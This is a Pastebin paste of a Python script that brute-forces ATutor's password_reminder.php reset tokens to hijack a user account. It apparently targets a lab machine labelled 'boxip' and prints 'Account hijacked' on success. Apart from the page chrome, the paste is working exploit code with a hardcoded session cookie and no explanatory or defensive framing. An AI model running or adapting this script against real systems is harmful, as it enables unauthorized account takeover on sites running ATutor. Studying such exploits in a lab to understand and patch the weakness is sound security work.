API tools faq
paste
gm0

test_script

gm0
Feb 27th, 2021 (edited)
42
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.62 KB | None | 0 0
raw download clone embed print report
  1. import hashlib, string, itertools, re, sys, requests, time
  2. from bs4 import BeautifulSoup
  3.  
  4. def generate_hash(id, epoch, passLength):
  5. hashes = []
  6. #length of 10:
  7. #range(0, 10000000000)
  8. chars = range(0,10 ** passLength)
  9. for num in chars:
  10. to_hash = str(id + epoch + num)
  11. hash_bit = hashlib.sha1(to_hash.encode()).hexdigest()[5:5+15]
  12. hashes.append(hash_bit)
  13.  
  14. return hashes
  15.  
  16. def request_password(ip, id, passLength):
  17. count = 0
  18.  
  19. current_epoch = int(((int(time.time()) / 60) / 60) / 24)
  20. max_epoch = int(current_epoch + 2)
  21.  
  22. for epoch_day in range(current_epoch, max_epoch + 1):
  23. hashes = generate_hash(id, epoch_day, passLength)
  24. #hashes = ["8635fc4e2a0c7d9d2d9ee40ea8bf2edd76d5757e"]
  25. for ha in hashes:
  26. url = "http://" + ip + "/ATutor/password_reminder.php" + "?id=" + str(id) + "&g=" + str(current_epoch) + "&h=" + ha
  27. headers = {
  28. "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
  29. "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
  30. "Accept-Language": "en-US,en;q=0.5",
  31. "Accept-Encoding": "gzip, deflate",
  32. "Connection": "close",
  33. "Cookie": "ATutorID=8aj0h6fubpq098dpo4bq43me71; flash=no; _ga=GA1.1.915717465.1612720457; showDetails=on; _gid=GA1.1.310955516.1614421837; _gat=1"
  34. }
  35.  
  36. proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
  37.  
  38. try:
  39. proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
  40. r = requests.get(url, allow_redirects=False, proxies=proxies, headers=headers, verify=False, timeout=0.001)
  41. #count += 1
  42. soup = BeautifulSoup(r.text, 'html.parser')
  43. expected_text = "Password changed successfully. You may now login using the new password"
  44.  
  45. if (r.status_code == 200 and expected_text in soup.text):
  46. return (True, ha, count, url)
  47. else:
  48. count += 1
  49. except Exception as e:
  50. print(f"{e}")
  51.  
  52. return (False, "Nothing", count, "")
  53.  
  54.  
  55. def main():
  56. ip = "boxip"
  57. id = 1
  58. passLength = 10
  59.  
  60. result, hash, count, url = request_password(ip, id, passLength)
  61. if(result):
  62. print (f"(+) Account hijacked via password reset {hash} using {count} requests!")
  63. else:
  64. print (f"(-) Account hijacking failed!")
  65.  
  66.  
  67. if __name__=="__main__":
  68. main()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!